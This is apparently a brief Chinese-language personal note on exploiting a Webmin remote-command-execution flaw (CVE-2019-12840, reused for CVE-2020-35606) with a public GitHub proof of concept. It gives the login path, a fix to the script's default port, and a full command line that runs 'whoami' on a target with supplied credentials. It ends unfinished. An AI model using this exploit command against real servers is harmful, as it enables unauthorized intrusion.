GitHub - KrE80r/webmin_cve-2019-12840_poc: A standalone POC for CVE-2019-12840A standalone POC for CVE-2019-12840. Contribute to KrE80r/webmin_cve-2019-12840_poc development by creating an account on GitHub.
https://github.com/KrE80r/webmin_cve-2019-12840_pocCVE-2020-35606使用的还是CVE-2019-12840的执行脚本,换了新的载体,利用方式还是一样的
https://ip:port/session_login.cgi
加上https://可以跳转到登录页面,直接登录
测试了一下上面这个POC比较好用,
下载后需要修改一下就port,自带的是10000,如果不修改,访问的所有的连接都是ip:port:1000导致失败,无法登录,不大不小的坑,愣是没发现
121行 parser.add_argument("-p", dest="port", default="1000", help="target port")
将“1000”修改为目标的端口
执行脚本,
python2 CVE-2019-12840.py -u https://ip -U username -P password -lport 17146(修改了脚本这里的端口可加可不加) -c "whoami"
执行成功,如
-c 执行一直失败,因为靶机在公网,我这里没有公网,看别人说的是使用metasploit监听回连
未完待续,